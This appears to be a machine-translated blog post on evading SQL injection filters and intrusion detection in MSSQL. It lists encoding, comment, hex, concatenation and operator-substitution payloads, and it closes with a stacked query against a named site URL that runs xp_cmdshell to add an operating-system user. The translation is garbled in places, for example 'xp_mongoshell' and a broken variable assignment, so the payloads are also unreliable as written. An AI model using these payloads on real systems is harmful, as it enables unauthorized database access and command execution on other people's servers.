Injection Restriction Bypass

I suddenly wondered if we could use any method to bypass the restrictions of SQL injection? I visited the Internet and found that most of the methods mentioned are aimed at and "'" and "=" filtering breakthroughs. Although they are somewhat improved, however, there are still some keywords that are not bypassed. Because I do not often intrude into the website, I do not dare to comment on the effect of the above filter, but it is certain that the effect will not be very good ......

After my collection, most of the anti-InjectionProgramThe following keywords are filtered:

And | select | update | CHR | Delete | % 20 from |; | insert | mid | master. | set | =

The most difficult thing to handle here is the select keyword. How can we break through them? Although the problem has not been completely solved, I 'd like to share it with you.

For keyword filtering, the following are my collected and my personal ideas.

1. Use the encoding technology to bypass

Such as urlencode and ASCII code bypass. For example, if or 1 = 1, % 6f % 72% 20% 31% 3D % 31, and test can also be char (101) + char (97) + char (115) + char (116 ).

2. Bypass with spaces

For example, if two spaces are used to replace one space, and tabs are used to replace spaces, or all spaces, such as 'sword' = 'sword', due to the loose nature of MSSQL, we can remove spaces between or words without affecting the operation.

3. Use string judgment instead

Use the classic or 1 = 1 to determine the bypass, for example, or 'sword' = 'sword'. This method is discussed online.

4. Bypass by type conversion modifier N

It can be said that this is a good idea. In addition to bypassing the restrictions to some extent, it also has other functions. Let's think about it. For exploitation, for example, or 'sword' = n' sword', capital N tells MSSQL Server that the string is of the nvarchar type and plays a type conversion function without affecting the injection statement itself, however, the knowledge-based pattern matching IDs can be avoided.

5. disassemble the string by the plus sign to bypass

The results are worthy of research, but after all, they are a method. For example, or 'sword' = 'sw '+ 'ords'; Exec ('in' + 'sert into' + '..... ')

6. bypass through like

Why didn't you think of it before? For example, or 'sword' like 'sw '!!! Obviously, you can easily bypass the "=" ">" restriction ......

7. bypass through in

Similar to the above like idea, for example, or 'sword' in ('sword ')

8. bypass through

For example, or 'sword' between 'rw 'and 'tw'

9. Pass> or <Bypass

Or 'sword'> 'sw'
Or 'sword' <'tw'
Or 1 <3

......

10. Use the comment statement to bypass

Use/**/instead of space, such as Union/**/select/**/user, PWD, from tbluser

Use/**/to separate sensitive words, such as: U/**/nion/**/SE/**/lect/**/user, PWD from tbluser

11. Bypass with hex. Generally, IDS cannot be detected.

0x730079007300610064006d0069006e00 = hex (SysAdmin)
0x640062005f006f0077006e0065007200 = hex (db_owner)

In addition, we can consider using the value Assignment Method for the filtering method of common points. For example, we can declare a variable a first, and then assign the value of our command to, then, call variable A to execute the input command. Variable A can be any command. As follows:

Declare @ A sysname
Select @ A =
Exec master. DBO. xp_mongoshell @

Effects http://www.ilikeplmm.com/show.asp? Id = 1; declare % 20 @ A % 20 sysname % 20 select % 20 @ A = running % 20 exec % 20master. DBO. xp_mongoshell % 20 @ ;--

The signature indicates "Net user Angel Pass/Add.